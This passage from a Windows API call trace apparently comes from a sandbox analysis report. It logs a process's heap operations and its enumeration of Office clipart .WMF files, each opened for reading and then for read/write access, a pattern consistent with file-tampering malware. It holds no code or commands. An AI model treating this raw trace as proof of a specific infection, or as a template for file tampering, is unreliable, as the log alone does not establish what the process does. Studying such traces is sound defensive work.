(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.611] AreFileApisANSI () returned 1 [0102.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0102.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 69 [0102.612] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x386c)) returned 1 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0102.612] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.612] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.612] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00248_.WMF", cAlternateFileName="")) returned 1 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0102.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0102.612] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.613] AreFileApisANSI () returned 1 [0102.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0102.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.613] AreFileApisANSI () returned 1 [0102.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0102.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 69 [0102.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.613] GetFileType (hFile=0x33c) returned 0x1 [0102.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.614] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.614] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.614] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.614] CloseHandle (hObject=0x33c) returned 1 [0102.614] AreFileApisANSI () returned 1 [0102.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0102.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 69 [0102.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.614] GetFileType (hFile=0x33c) returned 0x1 [0102.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.615] CloseHandle (hObject=0x33c) returned 1 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.616] AreFileApisANSI () returned 1 [0102.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 69 [0102.616] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x600)) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0102.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.616] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1264, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00252_.WMF", cAlternateFileName="")) returned 1 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0102.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0102.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0102.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0102.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0102.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0102.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.617] AreFileApisANSI () returned 1 [0102.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0102.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.617] AreFileApisANSI () returned 1 [0102.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 69 [0102.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.618] GetFileType (hFile=0x33c) returned 0x1 [0102.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.618] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.618] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | 